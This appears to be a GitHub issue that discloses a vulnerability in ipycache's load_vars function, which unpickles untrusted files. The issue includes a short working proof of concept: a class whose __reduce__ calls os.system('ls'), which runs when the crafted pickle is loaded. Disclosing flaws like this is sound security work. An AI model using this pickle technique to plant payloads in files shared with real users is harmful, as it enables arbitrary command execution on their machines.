ipycache.load_vars method is vulnerable

rossant / ipycache

Defines a %%cache cell magic in the IPython notebook to cache results of long-lasting computations in a persistent pickle file

BSD 3-Clause "New" or "Revised" License

138 stars 35 forks source link

ipycache.load_vars method is vulnerable #47

Open bigbigliang-malwarebenchmark opened 5 years ago

bigbigliang-malwarebenchmark commented 5 years ago

import os import pickle import ipycache

class Test(object):

def __init__(self):
    self.a = 1

def __reduce__(self):
    return (os.system,('ls',))

tmpdaa = Test() with open("a-file.pickle",'wb') as f:

pickle.dump(tmpdaa,f)

ipycache.load_vars('a-file.pickle','')

Hi，ipycache.load_vars function with evil data will cause command execution,if attack share evil data on internet,when user load it , it will cause command execution.